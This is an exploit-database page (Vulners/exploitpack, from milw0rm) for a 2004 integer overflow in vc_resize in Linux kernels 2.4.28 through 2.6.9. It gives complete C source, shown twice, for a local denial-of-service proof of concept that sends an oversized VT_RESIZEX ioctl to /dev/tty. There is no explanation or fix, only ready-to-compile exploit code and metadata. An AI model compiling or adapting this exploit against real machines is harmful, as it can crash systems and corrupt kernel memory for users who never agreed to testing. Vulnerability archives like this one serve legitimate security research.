Search...

Linux Kernel 2.4.282.6.9 - vc_resize int Local Overflow

2004-12-16T00:00:00

ID EXPLOITPACK:7B81633ED7C04A457DD4A8BF8F63F1BC
Type exploitpack
Reporter Georgi Guninski
Modified 2004-12-16T00:00:00

Description

Linux Kernel 2.4.282.6.9 - vc_resize int Local Overflow

                                        
                                            /* vc_resize int overflow
 * Copyright Georgi Guninski
 * Cannot be used in vulnerability databases
 * */
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/stat.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;linux/vt.h&gt;
#include &lt;sys/vt.h&gt;
#include &lt;sys/ioctl.h&gt;
#include &lt;string.h&gt;
#include &lt;unistd.h&gt;

int main(int ac, char **av)
{
int fd;
struct vt_consize vv;
int cou=4242;

fd=open("/dev/tty",O_RDWR);
if (fd&lt;0) {perror("open");return -42;}
memset(&vv,0,sizeof(vv));
vv.v_clin=0;
vv.v_vcol=0;
vv.v_ccol=0;

/* magic values, overflow on i386*/
vv.v_rows=65535;
vv.v_cols=32769;

system("sync");
if (ioctl(fd,VT_RESIZEX,&vv) &lt; 0) {perror("ioctl");return -4242;}
while(cou--) printf(";)\n");
close(fd);
return 42;
}

// milw0rm.com [2004-12-16]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:27", "references": [], "description": "\nLinux Kernel 2.4.282.6.9 - vc_resize int Local Overflow", "edition": 1, "reporter": "Georgi Guninski", "exploitpack": {"type": "dos", "platform": "linux"}, "published": "2004-12-16T00:00:00", "title": "Linux Kernel 2.4.282.6.9 - vc_resize int Local Overflow", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:27", "rev": 2}, "score": {"value": 0.7, "vector": "NONE", "modified": "2020-04-01T19:04:27", "rev": 2}, "vulnersScore": 0.7}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2004-12-16T00:00:00", "id": "EXPLOITPACK:7B81633ED7C04A457DD4A8BF8F63F1BC", "href": "", "viewCount": 1, "sourceData": "/* vc_resize int overflow\n * Copyright Georgi Guninski\n * Cannot be used in vulnerability databases\n * */\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <fcntl.h>\n#include <linux/vt.h>\n#include <sys/vt.h>\n#include <sys/ioctl.h>\n#include <string.h>\n#include <unistd.h>\n\nint main(int ac, char **av)\n{\nint fd;\nstruct vt_consize vv;\nint cou=4242;\n\nfd=open(\"/dev/tty\",O_RDWR);\nif (fd<0) {perror(\"open\");return -42;}\nmemset(&vv,0,sizeof(vv));\nvv.v_clin=0;\nvv.v_vcol=0;\nvv.v_ccol=0;\n\n/* magic values, overflow on i386*/\nvv.v_rows=65535;\nvv.v_cols=32769;\n\nsystem(\"sync\");\nif (ioctl(fd,VT_RESIZEX,&vv) < 0) {perror(\"ioctl\");return -4242;}\nwhile(cou--) printf(\";)\\n\");\nclose(fd);\nreturn 42;\n}\n\n// milw0rm.com [2004-12-16]", "cvss": {"score": 0.0, "vector": "NONE"}}